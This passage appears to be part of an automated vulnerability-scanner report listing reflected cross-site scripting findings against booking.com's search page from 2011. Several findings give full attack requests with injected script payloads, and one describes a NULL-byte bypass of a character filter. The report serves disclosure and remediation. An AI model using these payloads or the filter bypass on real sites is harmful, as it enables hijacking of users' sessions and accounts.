Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:45 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5susnz%2B%2FDu3gSLqTPdzNwjL1I31V18mXsyk%2B69o4hArL0OKvHY7Kvxwj%2FcgZmigWcuouhIz31s%2BHiNSsUcs7i90XA7al3KkuFl9h4U9OioXxDOBtJrYNqCbnyiliwrLNa9vcnwhCabGW0Gsi3X67dPlj%2B%2FUZrOixMUkWAdHdCpQO6KDlC%2BVaM074nNTbZUb%2FbRk%2FN10Lux1Y6x4JTqsk1sEgrgJKp3noVRuitHm9fAgIzgvQHoU5MXehonNAvfLYXApJ4fPWrCxMHOvRNXal8RUXCNwvBVbKDjZ4jcqpLua%2Bw7%2BqOHipoWsFLWyaVCHvjhthI06JhgXn%2BtsyCXvPhMdvEppUgdWRkDNFVgBQuafsgwBufDsAxjE3ql%2FxbvdimX%2FOR3ivcMQkorAcwjCsCKODYX4MyhLvhMo4LkDrfNx2sQm%2BQhxxwDTSAke6I7GZ7Wn%2F0MkD7OAIFfkkO0UAbWI3wr8%2BAhf8iNJxAD%2Fr2Bmxp9JGc4Kqg7eoXGR7qX2eb6jpi2LMxyncmGoi5V9XAilh6q18rjMcJJr%2FfCAQidB1KV%2F6SOy5x%2BoK%2FwGU9rgs86WSPHrhDptRoguskisPbYmKDPG%2BlK7y%2BPhUPGSc%2BZaMaTcbhmpMJiNOPmvQaGIvdYtl8L22StdH47ZOdJvJeGo%2F%2BflrNpRDiMJkPUSRVy5nTNPSBPl6V5ASZjlgxISPWFfllZg2udihj%2BM2OJ2EviHGjSx0v%2BMo%2FNtSHeUPFBunnW9hwi9gLD7O2Foe%2BSZ8X6ncgcLIqb4KkPdcriZWz46nJATp5qYlpkSICmk0A49qkTej5wZpi3SCNLdWiubULvChUlcArz%2B4LfeKZZUI3oKIpxlL04OKL%2B5Bg5GvY3JBiXQrTJ5hTsBjkPBlDew1XiUz%2F7dv8D9ucGGx7HSsPe%2BRrKLFqHEavmdSxfLwKp9mrc5IRa1Y%2Fs%2FdVVeBaNvV%2BGm3epUiqPYFVf69rf5lLT7DkbzjdGEDgz%2BIJKkxIrXgCfszLKVKqHeDu1yuYaLyVnKvfDp5KzNo%2BKFLqhKbvGJWjXYlK3QOjE%2FDU%2BpgEArXuU9kl4zWV9rKBbuVj63EiNAGTnnth9njbOGfVHtXtgRiup44QIeUyBKn6n8aXfETR17zkr3ETm1l3mk965DYp5TGYsh2nn02AeSAdeFd1rECbZyd7FADx%2FKHeU41lQIB28kLuPoxQU4x%2BMklM0aUS6iRdAuJ17r%2Banbw4fiU3%2B9v6QFN0Mg%2BKy1lfEFcXpEy7mDrfDDgzindKlyaWVt2UQdycXb%2BtBE%2FajEHI2%2BV6Ytm8X1cf9fR2PRHsIu8PuUY36BGdDoKEwXrdooxW0oaJMXqdiYsnVL%2BXD0EwsoxyaffsBhAcdRU%2F29z5F8G1UoPHhJ3ryqsktM8c9os43XZcqjkRshGvu3qkgD4I6vL1nrGVlxp3Q%2FwSRLKZzDOMveFBQ7EMRNNrsA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:21:46 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 424018
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
//www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717b92f4"><script>alert(1)</script>0924bec2c54&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...
4.225. http://www.booking.com/searchresults.html [label parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the label request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e13b6</script><script>alert(1)</script>4f08add9a9c was submitted in the label parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717e13b6</script><script>alert(1)</script>4f08add9a9c&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:02 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5susnz%2B%2FDu3gSLqTPdzNwjL1I31V18mXsyk%2B69o4hArL0OKvHY7Kvxwj%2FcgZmigWcuouhIz31s%2BHiNSsUcs7i90XA7al3KkuFl9h4U9OioXxDOBtJrYNqCbnyiliwrLNa9vcnwhCabGW0Gsi3X67dPlj%2B%2FUZrOixMUkWAdHdCpQO6KDlC%2BVaM074nNTbZUb%2FbRk%2FN10Lux1Y6x4JTqsk1sEgrgJKp3noVRuitHm9fAgIzgvQHoU5MXehonNAvfLYXApJ4fPWrCxMHOvRNXal8RUXCNwvBVbKDjZ4jcqpLua%2Bw7%2BqOHipoWsFLWyaVCHvjhthI06JhgXn%2BtsyCXvPhMdvEppUgdWRkDNFVgBQuafsgwBufDsAxjE3ql%2FxbvdimX%2FOR3ivcMQkorAcwjCsCKODYX4MyhLvhMo4LkDrfNx2sQm%2BQhxxwDTSAke6I7GZ7Wn%2F0MkD7OAIFfkkO0UAbWI3wr8%2BAhf8iNJxAD%2Fr2Bmxp9JGc4Kqg7eoXGR7qX2eb6jpi2LMxyncmGoi5V9XAilh6q18rjMcJJr%2FfCAQidB1KV%2F6SOy5x%2BoK%2FwGU9rgs86WSPHrhDptRoguskisPbYmKDPG%2BlK7y%2BPhUPGSc%2BZaMaTcbhmpMJiNOPmvQaGIvdYtl8L22StdH47ZOdJvJeGo%2F%2BflrNpRDiMJkPUSRVy5nTNPSBPl6V5ASZjlgxISPWFfllZg2udihj%2BM2OJ2EviHGjSx0v%2BMo%2FNtSHeUPFBunnW9hwi9gLD7O2Foe%2BSZ8X6ncgcLIqb4KkPdcriZWz46nJATp5qYlpkSICmk0A49qkTej5wZpi3SCNLdWiubULvChUlcArz%2B4LfeKZZUI3oKIpxlL04OKL%2B5Bg5GvY3JBiXQrTJ5hTsBjkPBlDew1XiUz%2F7dv8D9ucGGx7HSsPe%2BRrKLFqHEavmdSxfLwKp9mrc5IRa1Y%2Fs%2FdVVeBaNvV%2BGm3epUiqPYFVf69rf5lLT7DkbzjdGEDgz%2BIJKkxIrXgCfszLKVKqHeDu1yuYaLyVnKvfDp5KzNo%2BKFLqhKbvGJWjXYlK3QOjE%2FDU%2BpgEArXuU9kl4zWV9rKBbuVj63EiNAGTnnth9njbOGfVHtXtgRiup44QIeUyBKn6n8aXfETR17zkr3ETm1l3mk965DYp5TGYsh2nn02AeSAdeFd1rECbZyd7FADx%2FKHeU41lQIB28kLuPoxQU4x%2BMklM0aUS6iRdAuJ17r%2Banbw4fiU3%2B9v6QFN0Mg%2BKy1lfEFcXpEy7mDrfDDgzindKlyaWVt2UQdycXb%2BtBE%2FajEHI2%2BV6YpzrsI5SzS%2BQb%2Bb3G46mcFw7uv282jydUonn8V%2Be2DNNbuunjVd4QEKlf6kiOQwEhvC4Kem4egVt2gQx912jRKIqrlDWzWUpphx9ROSfi4stAQoqAHQe50OCUcSj5XYvqn7Dk8dHRqN8IOxuK%2FDfaCvdYEWClA4Feg%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:03 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 428678
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
//www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717e13b6</script><script>alert(1)</script>4f08add9a9c&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_url : '/searchresults.en-us.html?aid=335591;label=ufi-P20061717e13b6%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscri
...[SNIP]...
4.226. http://www.booking.com/searchresults.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29030'%3balert(1)//3ae62dd2bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29030';alert(1)//3ae62dd2bf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717&29030'%3balert(1)//3ae62dd2bf5=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:33 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDWgwOhJxwg7m3%2FTm%2Bpe85r18OTZ9lRoP8elUE0dmw8%2FadgG6c5SxD4aid1EHwSrafIW%2F%2B8zB3GAbDM2cHpJBfB%2BQWMskbjBCWuRuPQGSO3M9EnC3%2B%2F%2BIN3D8gRqTExPl002pYezY6pREisU7bEYN6ARwTakjbUeuXvOPUq79oSdYdUUc%2BJehsGqrvi%2B2X1f8S3cxGcUbWDagZH3JaA2gAbWBmGQo5RdUPZQ0PNg8q%2Bj0tolqe2zY0o130sRQ%2BgaqEYeqKyqz%2BmBrgR%2BERXMD0WbCbL44Ql%2FFAG0AZ3CCOogrnc64c0FVcMYAqevuH%2BGPP9HBNY%2Bwevrws%2BskbVBt4ZSLT7OJC7JsxbDRO3mQfnLKK2uU%2BsczsPJLx%2BZo1QEu6RZcfzC1CdfCEA109fIT9SSx5WP%2Fv79l1M4bTu6yPAFWFtVTkYxEos6RCfCd1YYvBtskch9dRo%2FZK1Q8LlP1KOJh6phIzwhuR31wBBTe3VlVllcYPyrcrTGDXrAeYhoXoucbNqHFibuAcuLlFy3WUkS8zuqnifgo0OOisJReiPE13DcLeSasidl4v%2FRDhmHICDUBi3DFc4Gu5MtyIxMwNaBkWqd%2BAVZ0YCxm6jtlmfLnT7UrbjaMqKPnFJeMGtDmXVPunAfNb4eUvjC1%2BNPsl1AG6qPsNuZ7Ku83YfG5aEu5qnTLnZCroYbaYeQ%2FbwbfXW0auZOoAM%2FHdKCHEfxgxCcYQYFedpQhzFpV8kNKHSPUXYtX4ARa0rNKrKSnMWkL%2Fl9Dalqe8A%2BhUBl9D4sEixGjmIYYmuqXipBEUm9%2F4xNO9jxtRwSbaaEXOKOMi4Z9udoU2cDUK8P3MrVU7wqSKNBRhANT069HQo4iQtLo5De8bozlUisHqg2MA4m7BNJ0mOmtz7id87cKAXcOIYJZJg%2BTG1BV%2F9GxovquslmsDKtygwe4kNkBQegUOnxpNn8clEYIYEWoqqD%2BEWUVKbXfP7CP1KXkm97URqaFViFHN2Q%2BFNEQMZ0XsRqHz5sjNcvePb7WhXl72uBamNjFz3YW4ILWz2r18%2BOm22boeXD42hs%2FhqXOJroc0cqG%2FPgzLMe%2BLbU6hOfBlo%2BSpE4boef%2FIDpcWu%2BBA%2FCZmnJgu%2FaxJcFG606bu%2BYcXBiLJTrcMIigZwuB3EAwY5%2B6uyx177WgkzViVbKxvuKii9O8jHl%2F8BsWZa4oBuzYs7TSNnwu4anmf6cXVUyy5%2BHZJ8vSaNo8bfyCKnRMijlKOIFkkXneSidfTNaWcckGeleCxQSZ%2FyIMRKRO%2FbAdIRb67UYcXaSZryIbWfM%2BFtYd5PrU03VEUmZNZKKHodg3YYitUMh8QTo5bCgUP6F0nozml4XkQkygjqo5ZuAKKeHwXMAnY3qIJ8IP0lWnQFbd0JqkNRXY8Et5fnW%2BZMVn50h4DZVqRelk%2B0xjopl17bATunSMO6qLC%2B4oLC7nAuxrXJA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:24:33 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391712
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?29030';alert(1)//3ae62dd2bf5=1;city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.see_a
...[SNIP]...
4.227. http://www.booking.com/searchresults.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b52e"><script>alert(1)</script>8dbb8f60cc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717&3b52e"><script>alert(1)</script>8dbb8f60cc8=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:21 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR6rjIsVt6f1jlSbwDWC0F5qg3fYIcn7xfVbwiCUl6bN%2Fm%2BbW6DM1iG9T9l75VgRlOysflS0PEchLGxSispJgP2km00tzbM%2FnIVzjuo%2B0%2BPa0EJvmEbracpGzLsPNXIOJRG%2FnOr5E6cYIuN%2FI468B1aBIrgFjh1wMbzrGtbVJFAVgv3MlVNvwkXluh91iXhxy2xDHMX6wAy3OnBjtl4Ah%2B0CswDLmYVqq02eNsDeoy23%2B5y7PkAAxBUQVJ2ngOXH%2BQXQfz2E%2BFFAlNRzkKYVKjNKW7gKOZaKjaePZ9fYcvP7i5nimNWdKWUVW0wHlvFRdTE%2Bvj4fFwn0Olx%2FLscop2vWHV5HnzDRsxAxeqPFWU%2FCmWTnBSon1bOxSMzr%2FRSIr6LnmZdmU%2FyM3GPwzkXsfYu%2BlVXhcCmMOby48ZMlG1Aw0nop%2FGlAJtMXbj9UsamMrrkGHm%2BIyhxcZBUkTYBRvoljFbvpV7YmWVeiDi0vRtlqefzxycCgH9gtnl653x1p%2Fp4cBqhE7vtdsJzvVfUYvYb92C4y4Me%2F9LvhlhGm1XnpN80n2LgmCG1fU1r1oLXDt0XPB3LfXaUYiTe1e7%2F0Fq7Eu5AWi1VLOOxeevH%2F74y1NPEy%2B0CcDAHiuJDITmgvJhdefc%2BIPc0G5wS%2B6ayhNXtmaxstyo6YRU3xNHXx%2B0%2B6O%2BMw0nyifAl7BVcJC7HlxDEUodRuCIXOCDrVwM98VWF9CwdhO5psAIV6RH9gvreeC3Adry6BkAfnTTf6lqsLntLO%2BJXCJqGdAMRlIw474fpGFV7C%2BcP1OKB4wIO%2FRqmGaGxSc1p9EnaN%2Ff0D5FSB7AThfnHM8XxK%2Bp1RAW9ldqa05YjorHkRWB6AhADQ0F4uXa%2BELTcyY6lvrTzUKln7%2BGprH6TYK8rMaMv2i5%2BA57Uf%2FIgAsT8naDmG7rPuFPeeWe%2B%2BwigQnVgTvXOJsLmUfwhyWxJrYBF6U5ASVWcDx8J0ogQklkaeVelLx37yshdIzYT0Mz7wWXApJM8n2l6xWIwePH%2FtZbsqX7oi5U0rjNfgg%2F8C6ehwUrDSgWf8PdeFNrAKegJCFeUyxH11tH120eIrfyFXyT%2B2qU8OJqxDPhI9iezUSKzvuXp3e9%2F5pIbWz24KOEX1weARv1H0crDYKo9qW%2FtsYlaXXggn3QDYvyvpHiYP51cr4DIgtCEuhAcUf%2FnnX1MIURYBo3KBXh2IZ1gWOLXh7YgKT3VTi6Fau%2FxukKvQxconvRuxtQaw4DITNrcSjbcVk9SzVt7ZTNWLH1i%2FFVrgZNDt8umkvDgGLVAyzq%2BPX0L0VZo%2Bg8%2FT4qC3A0oI8PasROAAdMF%2F%2Bi3%2B2QxF1IRvE7J%2FXFQfIlJdUZWHWr0LRV5SpqYpQv117OA3HTZJgZpRCCVuuaEd%2BgYhC6fbGETSM73Od5i1iCGtyC2Gq3GzPwwi8kw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:24:21 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391772
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?3b52e"><script>alert(1)</script>8dbb8f60cc8=1;city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717" />
...[SNIP]...
4.228. http://www.booking.com/searchresults.html [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_campaign request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc213'-alert(1)-'d336623f81e was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=usbc213'-alert(1)-'d336623f81e&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
